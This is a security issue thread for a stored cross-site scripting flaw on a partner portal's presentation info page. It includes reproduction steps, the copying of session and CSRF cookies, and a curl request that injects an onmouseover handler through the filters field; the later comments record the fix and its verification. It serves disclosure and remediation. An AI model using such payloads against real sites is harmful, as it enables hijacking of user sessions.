### ISSUE TITLE
SEC-4826 - XSS on https://partners.acronis.com/#collateral/presentation/[id]/info/ via filters

### ISSUE THREAD

**Issue by prashantjadhav92** [MindMatrix/SecurityTracker#72]
It is possible to create a filter in presentations (https://partners.acronis.com/#collateral/presentation/) with XSS payload, which will be rendered and executed on https://partners.acronis.com/#collateral/presentation/[id]/info/. 

1. Login and copy user's session value and CSRF token from cookies (.ASPXAUTH and X-CSRF-Token)
2. Go to https://partners.acronis.com/#collateral/presentation/ and create new presentation. Copy ID of this presentation
3. Make the following request (set proper <X-CSRF-Token>, <.ASPXAUTH>, <templateid> value)

curl -i  -X 'POST' -H 'Content-Type: application/json' -H 'X-Csrf-Token: <X-CSRF-Token>' -H 'X-Requested-With: XMLHttpRequest' -b 'X-CSRF-Token=<X-CSRF-Token>; .ASPXAUTH=<.ASPXAUTH>'  -d '{"templateid": <templateid>, "name": "New Media", "language": 0, "desc": "", "startdate":null, "enddate": null, "filters": "abc\"onmouseover=\"confirm(164)\"", "disconnected": true}' https://partners.acronis.com/api/SaveTemplateInfo

4. Go to https://partners.acronis.com/#collateral/presentation/[id]/info/ (set proper [id])
5. Move mouse over the filter, and XSS will be executed

Example: https://partners.acronis.com/#collateral/presentation/90750/info/

**Comment by PuneetRevclerx** [comment]
@shaileshtayde sir, I have verified the above mentioned security issue and JS is getting executed by following the above mentioned steps.

URL:  https://dvl-main.amp.vg/#collateral/presentation/4219/info
User: puneet security
Company: Automation Testers

![presentation xss](https://user-images.githubusercontent.com/102346181/178926705-19df9b09-2b38-4c71-ae24-249d93022ade.png)

**Comment by YogendraMatkar** [comment]
@PuneetRevclerx, this scenario is now handled, plz check on https://pr-51739.dvl.amp.vg/

**Comment by shivmishra** [comment]
@PuneetRevclerx i think this would be globally fixed in one of my PR. can you verify on main

**Comment by PuneetRevclerx** [comment]
@shivmishra sir, @sunrao sir, I have checked above security issue on main and it's working as expected now.

**Comment by PuneetRevclerx** [comment]
@prashantjadhav92 sir, I have checked above security issue on Acronis Production and it's working as expected now.

**Comment by prashantjadhav92** [comment]
I have asked the client to verify the fix.

**Comment by prashantjadhav92** [comment]
The fix has been verified.
